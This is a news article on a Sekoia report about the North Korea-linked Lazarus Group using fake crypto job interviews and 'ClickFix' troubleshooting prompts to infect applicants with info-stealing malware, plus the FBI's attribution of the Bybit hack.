A recent cybersecurity report by Sekoia has shed light on an evolving threat posed by the Lazarus Group, the notorious North Korea-linked hacking organization. This group is now leveraging a tactic known as “ClickFix” to specifically target job seekers in the cryptocurrency sector, particularly within centralized finance (CeFi).
This new approach is an adaptation of the group’s earlier “Contagious Interview” campaign, which previously targeted developers and engineers in artificial intelligence and crypto-related roles, showcasing the group’s ability to adapt its strategies in line with the job market trends.
Lazarus Exploits Crypto Hiring
In its newly observed campaign, Lazarus has shifted focus to non-technical professionals, such as marketing and business development personnel, by impersonating major crypto firms like Coinbase, KuCoin, Kraken, and even stablecoin issuer Tether. This strategy emphasizes the group’s intent to widen its net and entice a broader range of candidates.
The attackers create fraudulent websites that mimic legitimate job application portals to lure candidates with enticing fake interview invitations. Often, these sites include plausible application forms and even requests for video introductions, contributing to a false sense of legitimacy.
However, users attempting to record a video are met with fabricated error messages suggesting a webcam or driver malfunction. The page subsequently prompts the user to input PowerShell commands under the guise of troubleshooting, effectively triggering a malware download without the victim’s knowledge.
The ClickFix methodology, though relatively new, is gaining traction due in part to its psychological simplicity—users believe they are fixing a technical issue, unaware that they are executing harmful software. According to Sekoia, this campaign draws on materials from 184 fake interview invitations and references at least 14 well-known companies to bolster its credibility.
This latest tactic not only highlights Lazarus’s growing sophistication in social engineering but also reflects the group’s ability to exploit the professional aspirations of individuals in the highly competitive crypto job market. Interestingly, this shift suggests an expansion of the group’s targeting criteria to include individuals who, while not directly linked to coding or network security, may handle sensitive information or be unwitting facilitators of data breaches.
Despite the rise of ClickFix, Sekoia reported that the original Contagious Interview campaign remains active. This parallel deployment indicates that North Korea’s state-sponsored cybercriminals may be testing the effectiveness of their methods against different demographics. In both instances, the campaigns share a common goal—delivering info-stealing malware through trusted channels and manipulating victims into self-infection.
Lazarus Behind Bybit Hack
In a related matter, the Federal Bureau of Investigation (FBI) officially attributed the $1.5 billion attack on Bybit to the Lazarus Group. Hackers aimed at the crypto exchange employed fake job offers to deceive staff into installing malicious trading software known as “TraderTraitor.”
This application, although crafted to appear authentic through the use of cross-platform JavaScript and Node.js, embedded malware designed to steal private keys and execute illicit transactions on the blockchain, highlighting the considerable security risks posed by such tactics.
As the threat landscape continues to evolve, understanding the tactical shifts employed by groups like Lazarus is crucial for individuals and organizations alike in fortifying their defenses against these sophisticated cyber threats.
